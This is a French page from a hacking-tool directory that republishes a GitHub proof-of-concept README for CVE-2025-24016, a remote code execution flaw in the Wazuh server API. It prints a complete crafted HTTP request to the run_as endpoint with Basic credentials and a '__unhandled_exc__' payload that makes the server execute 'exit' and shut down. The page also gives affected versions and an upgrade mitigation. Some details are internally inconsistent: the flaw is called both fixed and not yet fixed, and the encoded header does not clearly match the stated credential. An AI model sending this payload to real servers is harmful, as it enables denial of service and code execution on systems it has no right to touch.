Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-24016 — CVE-2025-24016: RCE dans le serveur Wazuh! Exécution de code à distance | Kitploit
Outils/GitHubGitHub/glostarrx1/cve-2025-24016
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubglostarrx1/cve-2025-24016

CVE-2025-24016

CVE-2025-24016: RCE dans le serveur Wazuh! Exécution de code à distance

Voir le dépôt
16il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

Wazuh - Exécution de code à distance (RCE) - PoC

Vue d'ensemble de la vulnérabilité

Ce dépôt démontre la vulnérabilité d'exécution de code à distance (RCE) dans le serveur Wazuh, introduite par une désérialisation non sécurisée dans le paquet wazuh-manager. Cette vulnérabilité permet à des attaquants distants disposant d'un accès à l'API (tableau de bord compromis, serveurs Wazuh du cluster, ou certaines configurations avec des agents compromis) d'exécuter du code arbitraire sur le serveur.

Versions affectées

  • wazuh-manager version >= 4.4.0
  • Corrigé dans la version >= 4.9.1

Description

La vulnérabilité se produit dans l'API Wazuh, où les paramètres du DistributedAPI sont sérialisés en JSON puis désérialisés à l'aide de as_wazuh_object dans le fichier framework/wazuh/core/cluster/common.py. Un attaquant peut exploiter cette vulnérabilité en injectant un dictionnaire non assaini dans les requêtes DAPI, ce qui peut conduire à l'évaluation de code Python arbitraire.

La RCE peut être déclenchée via le point de terminaison run_as, qui permet à l'attaquant de contrôler l'argument auth_context. En forgeant une requête malveillante, du code arbitraire peut être exécuté sur le serveur maître.

Preuve de concept

Pour déclencher cette vulnérabilité à l'aide de l'API du serveur, suivez les étapes ci-dessous.

Requête Burp Suite du PoC

  1. Requête Burp Suite pour déclencher la vulnérabilité:
root@kitploit:~
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==  # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83

{
  "__unhandled_exc__": {
    "__class__": "exit",
    "__args__": []
  }
}

Image de la solution

  1. Explication de la requête:
  • En-tête Authorization: Il s'agit de l'autorisation encodée en base64 (wazuh-wui:MyS3cr37P450r.*-).
  • Charge utile: La charge utile malveillante contient l'exception non assainie __unhandled_exc__, qui déclenche l'exécution de code Python arbitraire (exit dans ce cas).

Impact

  • Exécution de code à distance (RCE): Cette vulnérabilité permet aux attaquants d'exécuter du code arbitraire sur le serveur Wazuh, affectant les versions >= 4.4.0 jusqu'à 4.9.0 (pas encore corrigées).
  • Déni de service potentiel: Dans ce PoC, la fonction exit est déclenchée, provoquant l'arrêt du serveur Wazuh.

Atténuation

Pour protéger vos systèmes, mettez à niveau vers Wazuh version >= 4.9.1 où ce problème est corrigé.

Télécharger l’outil